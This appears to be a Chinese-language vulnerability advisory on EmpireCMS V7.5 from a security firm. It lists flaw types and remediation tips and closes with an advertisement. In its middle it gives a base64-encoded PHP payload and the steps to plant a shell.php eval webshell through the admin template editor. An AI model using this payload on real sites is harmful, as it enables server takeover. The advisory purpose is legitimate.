最近,我們在對帝國CMS系統進行代碼安全審計時,發現該系統存在網站漏洞,受影響的版本是EmpireCMS V7.5。我們人工對其代碼進行詳細的漏洞檢測與安全代碼分析,發現存在三個高危漏洞,都是在網站的后臺管理頁面上的功能發現的。
帝國CMS系統是一款深受廣大站長和網站運營者喜歡的系統,它采用B/S架構開發,php語言+Mysql數據庫,支持大并發同時訪問,可以承載較多的用戶快速的訪問網站的各個頁面與內容。它具有模板自定義化,可以設置標簽與自行設計網站外觀,靜態html生成,還有采集功能等特點。
在對該代碼進行安全檢測與滲透測試的過程中,我們會先大體看下代碼,熟悉整個網站的架構,數據庫配置文件,以及入口調用到的文件。我們會關注安全規則是如何寫的,并從多個方面去了解該代碼。
目前,我們發現的網站漏洞包括:SQL注入漏洞、網站敏感信息泄露、初始化安裝功能漏洞、直行平行越權邏輯漏洞、任意文件上傳漏洞、登錄繞過漏洞、短信驗證碼漏洞、找回密碼漏洞、數據庫備份webshell、XSS跨站、CSRF漏洞等。這些漏洞的產生,主要是由于系統沒有對get,post提交方式進行嚴格的安全效驗與過濾,導致惡意代碼 ** 入到后端服務器中進行處理。
為了解決這些問題,我們SINE安全技術將采取相應的安全措施,包括修復漏洞、增強密碼強度、限制并發訪問等,以保障帝國CMS系統的安全性和穩定性。同時,我們也將定期進行安全審計和滲透測試,以確保系統的安全和用戶的合法權益。
在帝國CMS的安裝過程中,index.php文件在處理前端提交的參數時,可能存在泄露數據庫表前綴的風險。此外,fun.php文件中對參數的處理存在安全漏洞,未經驗證的惡意代碼可以直接被寫入到config.php配置文件中。這些信息可能會被惡意利用,因此我們建議盡快修復這個漏洞。
后臺還存在get webshell漏洞,打開后臺管理功能頁面,選擇管理首頁模板,緊接著右鍵點擊增加首頁方案中,復制漏洞exp代碼:<?php $aa = _decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密后是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php
寫到模板內容頁面里,左鍵點擊提交,再點擊啟用此方案,就在會e/admin/template/文件夾下生成一個shell.php文件。
??? 對于帝國CMS漏洞的修復辦法,我有以下建議:
1. 對所有GET和POST請求進行安全過濾:這是防止惡意代碼注入的有效手段。可以使用內置的過濾函數,如eaddslashes2,或者自定義過濾函數,對輸入數據進行安全檢查。
2. 增加惡意代碼攔截機制:在eaddslashes2參數中增加一個惡意代碼檢測機制,通過檢測后放行,這樣可以有效地防止惡意代碼的注入。
3. 更改網站后臺管理目錄:由于該漏洞利用需要擁有后臺管理員權限,建議對網站后臺的管理目錄進行更改,避免惡意訪問者獲取過多的權限。
4. 復雜化管理員密碼設置:對管理員的密碼進行復雜的設置,可以提高系統的安全性,減少密碼被猜測成功的可能性。
5. 專業網站安全公司協助:如果您對網站漏洞修復不是很了解,可以考慮尋求專業的網站安全公司的幫助。國內有許多優秀的網絡安全公司,如SINE安全、啟明星辰、綠盟等,他們可以提供專業的解決方案。
6. 及時修復漏洞:網站運營者應多多關注EmpireCMS的官方,一旦發現有新的補丁就立即進行修復。這樣可以盡可能減少安全損失。
我們專注高端建站,小程序開發、軟件系統定制開發、BUG修復、物聯網開發、各類API接口對接開發等。十余年開發經驗,每一個項目承諾做到滿意為止,多一次對比,一定讓您多一份收獲!